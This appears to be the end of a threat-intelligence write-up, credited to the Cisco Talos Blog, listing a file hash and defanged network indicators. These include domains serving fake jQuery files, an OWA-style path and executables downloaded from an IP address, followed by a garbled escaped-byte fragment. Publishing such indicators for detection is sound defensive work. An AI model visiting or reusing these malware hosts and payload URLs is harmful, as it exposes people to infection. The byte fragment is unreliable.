C02d50d0eb3974818091b8dd91a8bbb8cdefd94d4568a4aea8e1dcdd8869f738 

 Network IOCs 

cdn[.]phototagx[.]com 
www[.]roomako[.]com 
lgaircon[.]xyz
https://www[.]roomako[.]com/jquery-3[.]3[.]1[.]min[.]js  
https://lgaircon[.]xyz/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2 
https://cdn[.]lgaircon[.]xyz/jquery-3[.]3[.]1[.]min[.]js 
hxxps[://]cdn[.]phototagx[.]com/ 
  
192[.]210[.]239[.]172 
hxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[.]exe 
hxxp[://]192[.]210[.]239[.]172:3219/MCUCAT[.]exe 
hxxp[://]192[.]210[.]239[.]172:3219/TJPLYT[.]exe 
hxxp[://]192[.]210[.]239[.]172:3219/z44[.]exe 

xa5xdfx19x06xf3xd1;xb1x15xe9xdbxcanxc6xbaxdb{xd3xc4,xd4xcfxd1x07xe2x1fix07%xd2rx9cxa7xd1z+zxddxacxd0x18x04x8exfbqpxe1xe1xb81xb1vx12xe4x8dxf0xc0vx1cxf9xc6xcaxc8xedxc4,y~x17rxebp)xedxa6xbaxdcxf5+xeds.txdcx8blxee&x9ex84xb4axb1kx9axc1xx00qrxe6xbfqx02x03x01x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00′>

Cisco Talos Blog – ​Read More